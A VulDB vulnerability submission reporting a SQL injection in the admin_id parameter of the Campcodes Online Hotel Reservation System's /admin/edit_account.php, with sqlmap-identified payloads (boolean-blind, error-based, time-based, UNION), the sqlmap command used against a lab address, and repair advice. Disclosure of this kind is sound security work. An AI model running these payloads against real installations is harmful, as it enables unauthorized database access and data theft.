提交 #698602: Campcodes Online Hotel Reservation System V1.0 SQL Injection信息

标题Campcodes Online Hotel Reservation System V1.0 SQL Injection
描述## Vulnerability Type - SQL injection ## Root Cause In Online Hotel Reservation System "/admin/edit_account.php" found a SQL injection vulnerabilities. Websites can directly use blind injection for SQL queries. Attackers can observe the application's response or other visible behaviors to determine whether the injection is successful and further probe and exploit the data in the database. ## Impact Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION In Online Hotel Reservation System"/admin/edit_account.php" has discovered an SQL injection vulnerability. Websites can directly apply blind injection to SQL queries. Attackers obtain information about the database content by injecting conditional statements and taking advantage of Boolean condition-based judgments in the application. Attackers can try different conditions and verify their correctness based on the application's response. When constructing SQL query statements, the program directly uses the ID input by the user without performing any verification or filtering on it. Therefore, arbitrary SQL queries can be executed by entering malicious ids. <img width="1761" height="267" alt="Image" src="https://github.com/user-attachments/assets/9095c3d7-2266-47bb-b811-a50e453b7d43" /> # Vulnerability details and POC ## Vulnerability lonameion: - 'admin_id' parameter ## Payload: ```makefile sqlmap identified the following injection point(s) with a total of 188 HTTP(s) requests: --- Parameter: #1* (URI) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://192.168.126.133:82/admin/edit_account.php?admin_id=8' RLIKE (SELECT (CASE WHEN (5972=5972) THEN 8 ELSE 0x28 END))-- ahJK Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: http://192.168.126.133:82/admin/edit_account.php?admin_id=8' OR (SELECT 4154 FROM(SELECT COUNT(*),CONCAT(0x71716a7071,(SELECT (ELT(4154=4154,1))),0x71707a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aSmr Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://192.168.126.133:82/admin/edit_account.php?admin_id=8' AND (SELECT 5382 FROM (SELECT(SLEEP(5)))JxeN)-- ACBL Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: http://192.168.126.133:82/admin/edit_account.php?admin_id=-7918' UNION ALL SELECT CONCAT(0x71716a7071,0x49676e4b615544736a6274577948477a484a74514b67554f58754a536461574a4242794e53497748,0x71707a6b71),NULL,NULL,NULL# --- ``` ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash python3 sqlmap.py -u "http://192.168.126.133:82/admin/edit_account.php?admin_id=8*" --dbs --cookie PHPSESSID=fqdj4cl33n649v1gon6fm8krl2 ``` <img width="1706" height="646" alt="Image" src="https://github.com/user-attachments/assets/c4bb8230-62a4-4e25-8a4a-c8d0474e3d29" /> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
来源⚠️ https://www.yuque.com/u42535181/pm5nde/gv2vlzfghq5uaxwe#
用户
 xinyi (UID 91409)
提交2025-11-20 10時21分 (5 月前)
管理2025-11-22 20時23分 (2 days later)
状态重复
VulDB条目332458 [code-projects Simple Online Hotel Reservation System 1.0 /admin/edit_account.php admin_id SQL注入]
积分0

上一步一览下一步

Want to stay up to date on a daily basis?

Enable the mail alert feature now!